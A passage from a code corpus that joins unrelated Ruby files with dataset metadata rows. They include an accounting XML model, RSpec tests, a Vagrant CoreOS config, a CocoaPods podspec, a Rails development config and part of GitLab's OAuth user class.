attributes_at 'Vydej'
end
def doklad
at 'Doklad'
end
def doklad_attributes
attributes_at 'Doklad'
end
def ev_cis_dokl
at 'EvCisDokl'
end
def ev_cis_dokl_attributes
attributes_at 'EvCisDokl'
end
def zpusob_uctovani
at 'ZpusobUctovani'
end
def zpusob_uctovani_attributes
attributes_at 'ZpusobUctovani'
end
def storno
at 'Storno'
end
def storno_attributes
attributes_at 'Storno'
end
def del
at 'Del'
end
def del_attributes
attributes_at 'Del'
end
def popis
at 'Popis'
end
def popis_attributes
attributes_at 'Popis'
end
def dat_uc_pr
at 'DatUcPr'
end
def dat_uc_pr_attributes
attributes_at 'DatUcPr'
end
def dat_vyst
at 'DatVyst'
end
def dat_vyst_attributes
attributes_at 'DatVyst'
end
def dat_plat
at 'DatPlat'
end
def dat_plat_attributes
attributes_at 'DatPlat'
end
def dat_pln
at 'DatPln'
end
def dat_pln_attributes
attributes_at 'DatPln'
end
def dat_upl_dph
at 'DatUplDPH'
end
def dat_upl_dph_attributes
attributes_at 'DatUplDPH'
end
def vypis
at 'Vypis'
end
def vypis_attributes
attributes_at 'Vypis'
end
def id_polozky
at 'IDPolozky'
end
def id_polozky_attributes
attributes_at 'IDPolozky'
end
def ad_ucet
at 'AdUcet'
end
def ad_ucet_attributes
attributes_at 'AdUcet'
end
def ad_kod
at 'AdKod'
end
def ad_kod_attributes
attributes_at 'AdKod'
end
def prijat_dokl
at 'PrijatDokl'
end
def prijat_dokl_attributes
attributes_at 'PrijatDokl'
end
def var_sym
at 'VarSym'
end
def var_sym_attributes
attributes_at 'VarSym'
end
def par_sym
at 'ParSym'
end
def par_sym_attributes
attributes_at 'ParSym'
end
def kon_sym
at 'KonSym'
end
def kon_sym_attributes
attributes_at 'KonSym'
end
def spec_sym
at 'SpecSym'
end
def spec_sym_attributes
attributes_at 'SpecSym'
end
def adresa
submodel_at(DokladFirmaType, 'Adresa')
end
def pr_kont
at 'PrKont'
end
def pr_kont_attributes
attributes_at 'PrKont'
end
def cleneni
at 'Cleneni'
end
def cleneni_attributes
attributes_at 'Cleneni'
end
def stred
at 'Stred'
end
def stred_attributes
attributes_at 'Stred'
end
def zakazka
at 'Zakazka'
end
def zakazka_attributes
attributes_at 'Zakazka'
end
def cinnost
at 'Cinnost'
end
def cinnost_attributes
attributes_at 'Cinnost'
end
def stat_moss
at 'StatMOSS'
end
def stat_moss_attributes
attributes_at 'StatMOSS'
end
def zp_vyp_dph
at 'ZpVypDPH'
end
def zp_vyp_dph_attributes
attributes_at 'ZpVypDPH'
end
def s_sazba
at 'SSazba'
end
def s_sazba_attributes
attributes_at 'SSazba'
end
def z_sazba
at 'ZSazba'
end
def z_sazba_attributes
attributes_at 'ZSazba'
end
def souhrn_dph
submodel_at(SouhrnDPHType, 'SouhrnDPH')
end
def celkem
at 'Celkem'
end
def celkem_attributes
attributes_at 'Celkem'
end
def valuty
submodel_at(Valuty2, 'Valuty')
end
def pozn
at 'Pozn'
end
def pozn_attributes
attributes_at 'Pozn'
end
def d_rada
at 'DRada'
end
def d_rada_attributes
attributes_at 'DRada'
end
def d_cislo
at 'DCislo'
end
def d_cislo_attributes
attributes_at 'DCislo'
end
def vyst
at 'Vyst'
end
def vyst_attributes
attributes_at 'Vyst'
end
def typ_dokl
at 'TypDokl'
end
def typ_dokl_attributes
attributes_at 'TypDokl'
end
def ucet
submodel_at(Ucet, 'Ucet')
end
def seznam_norm_polozek
array_of_at(NormPolozUDType, ['SeznamNormPolozek', 'NormPolozka'])
end
def seznam_rozuct_polozek
array_of_at(RozuctPolozUDType, ['SeznamRozuctPolozek', 'RozuctPolozka'])
end
def vlajky
submodel_at(Vlajky, 'Vlajky')
end
def dokumenty
array_of_at(String, ['Dokumenty', 'Dokument'])
end
def to_h
hash = {}
hash[:attributes] = attributes
hash[:vydej] = vydej if has? 'Vydej'
hash[:vydej_attributes] = vydej_attributes if has? 'Vydej'
hash[:doklad] = doklad if has? 'Doklad'
hash[:doklad_attributes] = doklad_attributes if has? 'Doklad'
hash[:ev_cis_dokl] = ev_cis_dokl if has? 'EvCisDokl'
hash[:ev_cis_dokl_attributes] = ev_cis_dokl_attributes if has? 'EvCisDokl'
hash[:zpusob_uctovani] = zpusob_uctovani if has? 'ZpusobUctovani'
hash[:zpusob_uctovani_attributes] = zpusob_uctovani_attributes if has? 'ZpusobUctovani'
hash[:storno] = storno if has? 'Storno'
hash[:storno_attributes] = storno_attributes if has? 'Storno'
hash[:del] = del if has? 'Del'
hash[:del_attributes] = del_attributes if has? 'Del'
hash[:popis] = popis if has? 'Popis'
hash[:popis_attributes] = popis_attributes if has? 'Popis'
hash[:dat_uc_pr] = dat_uc_pr if has? 'DatUcPr'
hash[:dat_uc_pr_attributes] = dat_uc_pr_attributes if has? 'DatUcPr'
hash[:dat_vyst] = dat_vyst if has? 'DatVyst'
hash[:dat_vyst_attributes] = dat_vyst_attributes if has? 'DatVyst'
hash[:dat_plat] = dat_plat if has? 'DatPlat'
hash[:dat_plat_attributes] = dat_plat_attributes if has? 'DatPlat'
hash[:dat_pln] = dat_pln if has? 'DatPln'
hash[:dat_pln_attributes] = dat_pln_attributes if has? 'DatPln'
hash[:dat_upl_dph] = dat_upl_dph if has? 'DatUplDPH'
hash[:dat_upl_dph_attributes] = dat_upl_dph_attributes if has? 'DatUplDPH'
hash[:vypis] = vypis if has? 'Vypis'
hash[:vypis_attributes] = vypis_attributes if has? 'Vypis'
hash[:id_polozky] = id_polozky if has? 'IDPolozky'
hash[:id_polozky_attributes] = id_polozky_attributes if has? 'IDPolozky'
hash[:ad_ucet] = ad_ucet if has? 'AdUcet'
hash[:ad_ucet_attributes] = ad_ucet_attributes if has? 'AdUcet'
hash[:ad_kod] = ad_kod if has? 'AdKod'
hash[:ad_kod_attributes] = ad_kod_attributes if has? 'AdKod'
hash[:prijat_dokl] = prijat_dokl if has? 'PrijatDokl'
hash[:prijat_dokl_attributes] = prijat_dokl_attributes if has? 'PrijatDokl'
hash[:var_sym] = var_sym if has? 'VarSym'
hash[:var_sym_attributes] = var_sym_attributes if has? 'VarSym'
hash[:par_sym] = par_sym if has? 'ParSym'
hash[:par_sym_attributes] = par_sym_attributes if has? 'ParSym'
hash[:kon_sym] = kon_sym if has? 'KonSym'
hash[:kon_sym_attributes] = kon_sym_attributes if has? 'KonSym'
hash[:spec_sym] = spec_sym if has? 'SpecSym'
hash[:spec_sym_attributes] = spec_sym_attributes if has? 'SpecSym'
hash[:adresa] = adresa.to_h if has? 'Adresa'
hash[:pr_kont] = pr_kont if has? 'PrKont'
hash[:pr_kont_attributes] = pr_kont_attributes if has? 'PrKont'
hash[:cleneni] = cleneni if has? 'Cleneni'
hash[:cleneni_attributes] = cleneni_attributes if has? 'Cleneni'
hash[:stred] = stred if has? 'Stred'
hash[:stred_attributes] = stred_attributes if has? 'Stred'
hash[:zakazka] = zakazka if has? 'Zakazka'
hash[:zakazka_attributes] = zakazka_attributes if has? 'Zakazka'
hash[:cinnost] = cinnost if has? 'Cinnost'
hash[:cinnost_attributes] = cinnost_attributes if has? 'Cinnost'
hash[:stat_moss] = stat_moss if has? 'StatMOSS'
hash[:stat_moss_attributes] = stat_moss_attributes if has? 'StatMOSS'
hash[:zp_vyp_dph] = zp_vyp_dph if has? 'ZpVypDPH'
hash[:zp_vyp_dph_attributes] = zp_vyp_dph_attributes if has? 'ZpVypDPH'
hash[:s_sazba] = s_sazba if has? 'SSazba'
hash[:s_sazba_attributes] = s_sazba_attributes if has? 'SSazba'
hash[:z_sazba] = z_sazba if has? 'ZSazba'
hash[:z_sazba_attributes] = z_sazba_attributes if has? 'ZSazba'
hash[:souhrn_dph] = souhrn_dph.to_h if has? 'SouhrnDPH'
hash[:celkem] = celkem if has? 'Celkem'
hash[:celkem_attributes] = celkem_attributes if has? 'Celkem'
hash[:valuty] = valuty.to_h if has? 'Valuty'
hash[:pozn] = pozn if has? 'Pozn'
hash[:pozn_attributes] = pozn_attributes if has? 'Pozn'
hash[:d_rada] = d_rada if has? 'DRada'
hash[:d_rada_attributes] = d_rada_attributes if has? 'DRada'
hash[:d_cislo] = d_cislo if has? 'DCislo'
hash[:d_cislo_attributes] = d_cislo_attributes if has? 'DCislo'
hash[:vyst] = vyst if has? 'Vyst'
hash[:vyst_attributes] = vyst_attributes if has? 'Vyst'
hash[:typ_dokl] = typ_dokl if has? 'TypDokl'
hash[:typ_dokl_attributes] = typ_dokl_attributes if has? 'TypDokl'
hash[:ucet] = ucet.to_h if has? 'Ucet'
hash[:seznam_norm_polozek] = seznam_norm_polozek.map(&:to_h) if has? 'SeznamNormPolozek'
hash[:seznam_rozuct_polozek] = seznam_rozuct_polozek.map(&:to_h) if has? 'SeznamRozuctPolozek'
hash[:vlajky] = vlajky.to_h if has? 'Vlajky'
hash[:dokumenty] = dokumenty if has? 'Dokumenty'
hash
end
end
end
end | 24.73494 | 102 | 0.604189 |
914726c25e2397a9e5a36361af5747e0b02ee000 | 1,075 | require 'test_helper'
class CassandraObject::CallbacksTest < CassandraObject::TestCase
class TestIssue < CassandraObject::BaseSchemaless
self.column_family = 'Issues'
string :description
%w(before_validation after_validation after_save after_create after_update after_destroy).each do |method|
send(method) do
callback_history << method
end
end
def reset_callback_history
@callback_history = []
end
def callback_history
@callback_history ||= []
end
end
test 'create' do
issue = TestIssue.create
assert_equal ['before_validation', 'after_validation', 'after_save', 'after_create'], issue.callback_history
end
test 'update' do
issue = TestIssue.create
issue.reset_callback_history
issue.update_attribute :description, 'foo'
assert_equal ['after_save', 'after_update'], issue.callback_history
end
test 'destroy' do
issue = TestIssue.create
issue.reset_callback_history
issue.destroy
assert_equal ['after_destroy'], issue.callback_history
end
end
| 22.87234 | 112 | 0.72 |
21c3669979c3581ab1155550af9eca0432c58331 | 581 | # frozen_string_literal: true
# rubocop:disable Graphql/AuthorizeTypes
module Types
class AccessLevelType < Types::BaseObject
graphql_name 'AccessLevel'
description 'Represents the access level of a relationship between a User and object that it is related to'
field :integer_value, GraphQL::INT_TYPE, null: true,
description: 'Integer representation of access level.',
method: :to_i
field :string_value, Types::AccessLevelEnum, null: true,
description: 'String representation of access level.',
method: :to_i
end
end
| 32.277778 | 111 | 0.719449 |
03e84beff27b0b7c9b86a08a9bc5a186c2d66cd9 | 1,251 | module Rediscover
module Frame
class Main < Wx::Frame
include Wx
WINDOW_WIDTH = 600
WINDOW_HEIGHT = 400
def initialize
super(nil, -1, 'Rediscover', DEFAULT_POSITION, Size.new(WINDOW_WIDTH, WINDOW_HEIGHT))
@redis = get_app.redis
@logger = get_app.logger
set_icon(Rediscover::Icon.new('application'))
setup_status_bar
setup_notebook
show
end
def setup_notebook
@notebook = Notebook.new(self)
@server_page = Panel::Server.new(@notebook)
@browser_page = Panel::Browser.new(@notebook)
@browser_page.on_status_change { |status| update_status_bar(status) }
@notebook.add_page(@server_page, 'Server Info', false)
@notebook.add_page(@browser_page, 'Key Browser', true)
end
def setup_status_bar
@status_bar = create_status_bar(2)
@status_bar.set_status_widths([-3, -1]) # set fields to variable widths
update_status_bar
end
def update_status_bar(status = nil)
@status_bar.set_status_text(@redis.to_s, 0) # connection info in left field
@status_bar.set_status_text(status, 1) if status # key count in right field
end
end
end
end
| 26.617021 | 93 | 0.644285 |
62b5b2c75606c0f922d960abb1c3df1b78f326eb | 2,614 | # Size of the CoreOS cluster created by Vagrant
$num_instances=1
# Used to fetch a new discovery token for a cluster of size $num_instances
$new_discovery_url="https://discovery.etcd.io/new?size=#{$num_instances}"
# To automatically replace the discovery token on 'vagrant up', uncomment
# the lines below:
#
if File.exists?('user-data') && ARGV[0].eql?('up')
require 'open-uri'
require 'yaml'
token = open($new_discovery_url).read
data = YAML.load(IO.readlines('user-data')[1..-1].join)
if data['coreos'].key? 'etcd'
data['coreos']['etcd']['discovery'] = token
end
yaml = YAML.dump(data)
File.open('user-data', 'w') { |file| file.write("#cloud-config\n\n#{yaml}") }
end
#
# coreos-vagrant is configured through a series of configuration
# options (global ruby variables) which are detailed below. To modify
# these options, first copy this file to "config.rb". Then simply
# uncomment the necessary lines, leaving the $, and replace everything
# after the equals sign..
# Change basename of the VM
# The default value is "core", which results in VMs named starting with
# "core-01" through to "core-${num_instances}".
#$instance_name_prefix="core"
# Official CoreOS channel from which updates should be downloaded
$update_channel='beta'
# Log the serial consoles of CoreOS VMs to log/
# Enable by setting value to true, disable with false
# WARNING: Serial logging is known to result in extremely high CPU usage with
# VirtualBox, so should only be used in debugging situations
#$enable_serial_logging=false
# Enable port forwarding of Docker TCP socket
# Set to the TCP port you want exposed on the *host* machine, default is 2375
# If 2375 is used, Vagrant will auto-increment (e.g. in the case of $num_instances > 1)
# You can then use the docker tool locally by setting the following env var:
# export DOCKER_HOST='tcp://127.0.0.1:2375'
#$expose_docker_tcp=2375
# Enable NFS sharing of your home directory ($HOME) to CoreOS
# It will be mounted at the same path in the VM as on the host.
# Example: /Users/foobar -> /Users/foobar
#$share_home=false
# Customize VMs
$vm_gui = false
$vm_memory = 256
$vm_cpus = 1
# Share additional folders to the CoreOS VMs
# For example,
# $shared_folders = {'/path/on/host' => '/path/on/guest', '/home/foo/app' => '/app'}
# or, to map host folders to guest folders of the same name,
# $shared_folders = Hash[*['/home/foo/app1', '/home/foo/app2'].map{|d| [d, d]}.flatten]
#$shared_folders = {}
# Enable port forwarding from guest(s) to host machine, syntax is: { 80 => 8080 }, auto correction is enabled by default.
#$forwarded_ports = {}
| 35.808219 | 121 | 0.722647 |
f7e316bd21638da56b1a86bd95ce8f4304b201f1 | 15,969 | require_relative 'spec_helper'
require 'sprockets_metadata'
require 'opal/rspec/rake_task'
describe SprocketsMetadata do
describe '::get_dependency_graph' do
include_context :temp_dir
RSpec::Matchers.define :have_graph do |expected|
match do |actual|
actual_keys = actual[:file_mapping].keys
expected_keys = expected[:file_mapping].keys
@matcher = eq(expected_keys)
# Test hash order
next nil unless @matcher.matches? actual_keys
@matcher = eq(expected)
@matcher.matches? actual
end
failure_message do
@matcher.failure_message
end
end
let(:sprockets_env) do
original_env = Opal::RSpec::SprocketsEnvironment.new '**/*.rb',
nil,
nil,
@temp_dir
original_env.add_spec_paths_to_sprockets
original_env.cached
end
subject { SprocketsMetadata.get_dependency_graph sprockets_env, files }
context 'no other dependencies' do
before do
create_dummy_spec_files 'single_file.rb'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => []
})
end
end
context '1 level of 2 dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => []
})
end
end
context 'nested dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'level2.rb', 'level3.rb'
File.write absolute_path('single_file.rb'), 'require "level2"'
File.write absolute_path('level2.rb'), 'require "level3"'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'level3.js' => absolute_path('level3.rb'),
'level2.js' => absolute_path('level2.rb'),
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => %w(level3.js level2.js),
'level3.js' => [],
'level2.js' => %w(level3.js)
})
end
end
context 'self-referential' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('other_file.rb'), 'require "single_file"'
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => %w(single_file.js)
})
end
end
context 'back reference' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb', 'third_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('third_file.rb'), 'require "single_file"'
end
let(:files) { %w(single_file third_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb'),
'third_file.js' => absolute_path('third_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => [],
'third_file.js' => %w(other_file.js single_file.js)
})
end
end
context 'sprockets style require' do
before do
create_dummy_spec_files 'single_file.js', 'other_file.rb'
File.write absolute_path('single_file.js'), "//\n//= require other_file\n"
end
let(:files) { %w(single_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.js')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => []
})
end
end
context 'multiple files' do
context 'shared dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb', 'third_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('third_file.rb'), 'require "other_file"'
end
let(:files) { %w(single_file third_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb'),
'third_file.js' => absolute_path('third_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => [],
'third_file.js' => %w(other_file.js)
})
end
end
context 'each has different dependencies' do
before do
create_dummy_spec_files 'single_file.rb', 'other_file.rb', 'third_file.rb', 'yet_another_file.rb'
File.write absolute_path('single_file.rb'), 'require "other_file"'
File.write absolute_path('third_file.rb'), 'require "yet_another_file"'
end
let(:files) { %w(single_file third_file) }
it do
is_expected.to have_graph(file_mapping: {
'other_file.js' => absolute_path('other_file.rb'),
'single_file.js' => absolute_path('single_file.rb'),
'yet_another_file.js' => absolute_path('yet_another_file.rb'),
'third_file.js' => absolute_path('third_file.rb')
},
dependencies: {
'single_file.js' => %w(other_file.js),
'other_file.js' => [],
'third_file.js' => %w(yet_another_file.js),
'yet_another_file.js' => []
})
end
end
end
end
describe '::get_metadata' do
let(:roll_up_list) { [] }
let(:watch) { false }
subject { SprocketsMetadata.get_metadata dependency_graph, roll_up_list, watch }
context 'no dependencies' do
let(:dependency_graph) do
{
file_mapping: {
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => [],
'file2.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: false
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'dependencies' do
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file3.rb' => {
logical_path: 'file3.js',
watch: false,
roll_up: false
},
'/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: false
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'watches enabled' do
let(:watch) { true }
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file3.rb' => {
logical_path: 'file3.js',
watch: true,
roll_up: false
},
'/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: true,
roll_up: false
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: true,
roll_up: false
})
end
end
context 'roll up enabled' do
let(:roll_up_list) do
%w(file1.rb)
end
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'roll up by regex' do
let(:roll_up_list) do
[/something/]
end
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'something/file1.js' => '/some/dir/something/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'something/file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/something/file1.rb' => {
logical_path: 'something/file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context '2 files both have the same dependency and 1 is rolled up' do
let(:roll_up_list) do
%w(file1.rb)
end
let(:dependency_graph) do
{
file_mapping: {
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb',
'file2.js' => '/some/dir/file2.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => ['file3.js'],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
context 'roll up asset comes later in list' do
let(:roll_up_list) do
%w(file1.rb)
end
let(:dependency_graph) do
{
file_mapping: {
'file2.js' => '/some/dir/file2.rb',
'file3.js' => '/some/dir/file3.rb',
'file1.js' => '/some/dir/file1.rb'
},
dependencies: {
'file1.js' => ['file3.js'],
'file2.js' => [],
'file3.js' => []
}
}
end
it do
is_expected.to eq('/some/dir/file1.rb' => {
logical_path: 'file1.js',
watch: false,
roll_up: true
},
'/some/dir/file2.rb' => {
logical_path: 'file2.js',
watch: false,
roll_up: false
})
end
end
end
describe '::default_roll_up_list' do
subject { SprocketsMetadata.default_roll_up_list }
context 'mocked' do
before do
stuff = double
allow(Gem::Specification).to receive(:find_all_by_name).with('opal').and_return([stuff])
allow(stuff).to receive(:gem_dir).and_return('/some/path/to/gems/opal')
end
it { is_expected.to eq [%r{/some/path/to/gems}] }
end
context 'real' do
it { is_expected.to include(be_a(Regexp)) }
end
end
end
| 33.904459 | 107 | 0.416682 |
ab0fab93ade54a2deeed94a7284631bc601ee6fc | 1,768 | # This file specifies the Pod setup for GTMSessionFetcher. It enables developers
# to import GTMSessionFetcher via the CocoaPods dependency Manager.
Pod::Spec.new do |s|
s.name = 'GTMSessionFetcher'
s.version = '1.6.1'
s.authors = 'Google Inc.'
s.license = { :type => 'Apache', :file => 'LICENSE' }
s.homepage = 'https://github.com/google/gtm-session-fetcher'
s.source = { :git => 'https://github.com/google/gtm-session-fetcher.git',
:tag => "v#{s.version}" }
s.summary = 'Google Toolbox for Mac - Session Fetcher'
s.description = <<-DESC
GTMSessionFetcher makes it easy for Cocoa applications
to perform http operations. The fetcher is implemented
as a wrapper on NSURLSession, so its behavior is asynchronous
and uses operating-system settings on iOS and Mac OS X.
DESC
s.ios.deployment_target = '9.0'
s.osx.deployment_target = '10.12'
s.tvos.deployment_target = '10.0'
s.watchos.deployment_target = '6.0'
s.default_subspec = 'Full'
s.subspec 'Core' do |sp|
sp.source_files =
'Source/GTMSessionFetcher.{h,m}',
'Source/GTMSessionFetcherLogging.{h,m}',
'Source/GTMSessionFetcherService.{h,m}',
'Source/GTMSessionUploadFetcher.{h,m}'
sp.framework = 'Security'
end
s.subspec 'Full' do |sp|
sp.source_files =
'Source/GTMGatherInputStream.{h,m}',
'Source/GTMMIMEDocument.{h,m}',
'Source/GTMReadMonitorInputStream.{h,m}'
sp.dependency 'GTMSessionFetcher/Core', "#{s.version}"
end
s.subspec 'LogView' do |sp|
# Only relevant for iOS
sp.platform = :ios
sp.source_files =
'Source/GTMSessionFetcherLogViewController.{h,m}'
sp.dependency 'GTMSessionFetcher/Core', "#{s.version}"
end
end
| 34 | 80 | 0.665724 |
21efbaeac3d447f7cbb3a9501bdf06996d7520e1 | 969 | RSpec.describe 'Inertia::Request', type: :request do
describe 'it tests whether a call is an inertia call' do
subject { response.status }
before { get inertia_request_test_path, headers: headers }
context 'it is an inertia call' do
let(:headers) { {'X-Inertia' => true} }
it { is_expected.to eq 202 }
end
context 'it is not an inertia call' do
let(:headers) { Hash.new }
it { is_expected.to eq 200 }
end
end
describe 'it tests whether a call is a partial inertia call' do
subject { response.status }
before { get inertia_partial_request_test_path, headers: headers }
context 'it is a partial inertia call' do
let(:headers) { { 'X-Inertia' => true, 'X-Inertia-Partial-Data' => 'foo,bar,baz' } }
it { is_expected.to eq 202 }
end
context 'it is not a partial inertia call' do
let(:headers) { { 'X-Inertia' => true } }
it { is_expected.to eq 200 }
end
end
end
| 26.916667 | 90 | 0.633643 |
7926dd5220f462660ca86530b302951175167eca | 523 | module SugarCRM; class Connection
# Retrieves the list of modules available to the current user logged into the system.
def get_available_modules
login! unless logged_in?
json = <<-EOF
{
"session": "#{@sugar_session_id}"
}
EOF
json.gsub!(/^\s{6}/,'')
mods = send!(:get_available_modules, json)["modules"]
modules = []
mods.each do |mod|
modules << Module.new(@session, mod)
end
modules
end
alias :get_modules :get_available_modules
end; end | 23.772727 | 89 | 0.625239 |
e8fa625d8c43718cce2dec9b2f2476a05a48fd8e | 1,568 | #
# Author:: Enrico Stahn <[email protected]>
#
# Copyright 2014, Zanui, <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "codeclimate-test-reporter"
require "simplecov"
require "coveralls"
# This module is only used to check the environment is currently a testing env
module SpecHelper
end
SimpleCov.formatter = SimpleCov::Formatter::MultiFormatter[
Coveralls::SimpleCov::Formatter,
SimpleCov::Formatter::HTMLFormatter,
CodeClimate::TestReporter::Formatter
]
SimpleCov.start
require "github_changelog_generator"
require "github_changelog_generator/task"
RSpec.configure do |config|
config.expect_with :rspec do |expectations|
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
config.mock_with :rspec do |mocks|
mocks.verify_partial_doubles = true
end
config.filter_run :focus
config.run_all_when_everything_filtered = true
config.warnings = true
config.default_formatter = "doc" if config.files_to_run.one?
config.order = :random
Kernel.srand config.seed
end
| 28 | 78 | 0.777423 |
26ed38cee7135be730e2b113456f5c1a2bb0aebb | 2,049 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => 'public, max-age=172800'
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
# Make app the standard subdomain
config.after_initialize do
Rails.application.routes.default_url_options[:host] = 'app.lvh.me:3000'
end # after_initialize
end
| 34.15 | 85 | 0.762811 |
b933f99d246a43989745650ca3789b278c2b3548 | 8,204 | # OAuth extension for User model
#
# * Find GitLab user based on omniauth uid and provider
# * Create new user from omniauth data
#
module Gitlab
module Auth
module OAuth
class User
prepend ::EE::Gitlab::Auth::OAuth::User
SignupDisabledError = Class.new(StandardError)
SigninDisabledForProviderError = Class.new(StandardError)
attr_accessor :auth_hash, :gl_user
def initialize(auth_hash)
self.auth_hash = auth_hash
update_profile
add_or_update_user_identities
end
def persisted?
gl_user.try(:persisted?)
end
def new?
!persisted?
end
def valid?
gl_user.try(:valid?)
end
def valid_sign_in?
valid? && persisted?
end
def save(provider = 'OAuth')
raise SigninDisabledForProviderError if oauth_provider_disabled?
raise SignupDisabledError unless gl_user
block_after_save = needs_blocking?
Users::UpdateService.new(gl_user, user: gl_user).execute!
gl_user.block if block_after_save
log.info "(#{provider}) saving user #{auth_hash.email} from login with extern_uid => #{auth_hash.uid}"
gl_user
rescue ActiveRecord::RecordInvalid => e
log.info "(#{provider}) Error saving user #{auth_hash.uid} (#{auth_hash.email}): #{gl_user.errors.full_messages}"
return self, e.record.errors
end
def gl_user
return @gl_user if defined?(@gl_user)
@gl_user = find_user
end
def find_user
user = find_by_uid_and_provider
user ||= find_or_build_ldap_user if auto_link_ldap_user?
user ||= build_new_user if signup_enabled?
user.external = true if external_provider? && user&.new_record?
user
end
def find_and_update!
save if should_save?
gl_user
end
protected
def should_save?
true
end
def add_or_update_user_identities
return unless gl_user
# find_or_initialize_by doesn't update `gl_user.identities`, and isn't autosaved.
